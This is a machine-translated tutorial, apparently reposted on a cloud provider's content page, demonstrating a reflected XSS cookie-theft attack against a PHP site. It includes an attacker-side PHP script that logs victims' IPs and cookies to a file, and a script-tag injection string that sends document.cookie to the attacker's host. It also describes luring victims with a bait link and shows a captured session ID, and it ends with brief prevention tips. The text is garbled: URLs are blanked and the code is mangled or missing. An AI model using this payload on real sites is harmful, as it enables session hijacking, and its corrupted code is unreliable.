XSS and xss

Source: Internet
Author: User

XSS and xss

Most people have a basic understanding of the principles of XSS. Here we will not repeat it again. We will only provide a complete example to demonstrate its principles.

1. Role Assignment
  • Websites with XXS vulnerabilities, IP address, PHP is the development language
  • Victim visitor, IP address, browser IE11
  • Hacker data receiving website, IP address, PHP is the development language
2. Source Code instance 2.1 vulnerability website

Vulnerability URL: http: //

<?phpsession_start();?><!doctype html>

This webpage writes the form data sent by the user through GET directly to the returned html stream without processing. This is where the XSS vulnerability exists.

2.2 hackers receive websites

The URL of the website to be received is http: //

<? Php $ victim = 'xxs: '. $ _ SERVER ['remote _ ADDR']. ':' .20._get1_'cookie'{file_put_contents('xss_victim.txt ', $ victim );

Write the user's IP address and cookieword used by the website without holes into the xss_victim.txt file for backup.

2.3 normal user access

You can use IE11 to access the website. Currently, session + cookie is used to store user logon information on websites. The website verifies the cookie to determine whether the user is valid and logged on. Therefore, cookie is the user's sensitive data.

3 attack process 3.1 The hacker prepares the attack string to construct the attack URL

Hackers can use a variety of scanning tools or manual input to find the URLs of websites with XSS vulnerabilities, and then carefully construct attack strings. In this example, the constructed string is:

"/> <script>window.open(""+document.cookie);</script><!--

As long as this string is input and submitted as the form value in the vulnerability website text editing box, it will cause an attack. Manually enter this string and submit it. The browser address bar automatically generates an attack URL. For example:

In this case, the html code used to access the website with the vulnerability is modified:

<!doctype html>

Obviously, this html will go back and execute a script, which sends the user's cookie to the hacker's receiving website.

The final attack URL is:

The next step is to find the victim and entice him to click on the above URL.

3.2 users mistakenly click the attacked URL

Hackers can use various means, including sending emails to publish the attack URL on various forums, such as making the following attractive connections.

Diaosi liked the beauty most. Driven by curiosity, they clicked on the beauty picture. The consequence of clicking is to access the previous attack URL.

3.3 sensitive user data is sent to hacker receiving websites

After the victim accesses the attacked URL, sensitive data is automatically sent to the hacker's receiving website. The receiving website saves the sensitive information to the file. Of course, the actual situation must be stored in the database.

Xss_victim.txt now stores sensitive data of the victim.

Cookie obtained by XXS: PHPSESSID = 4duu55hgci1leee4os6101cl30

Note that the XSS filter is enabled by default in IE11, and IE will block the above simple Attack Script. To simulate attacks, we temporarily disable the XSS filter.

3.4 hackers use sensitive data to do bad things

With the sensitive data of the victim user, you can use the data to do various bad things, such as logging on to the website as the victim user, and so on.

4. XSS prevention

XSS prevention can be started from multiple aspects:

(1) As described above, the browser itself can identify simple XSS attack strings to prevent simple XSS attacks;

(2) fundamentally, the solution is to eliminate the XSS vulnerability of the website, which requires website developers to keep their security in mind by using escape security characters and other means;

(3) For Common Internet users, be sure to resist the temptation as much as possible. Do not click the link of a non-well-known website.


Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.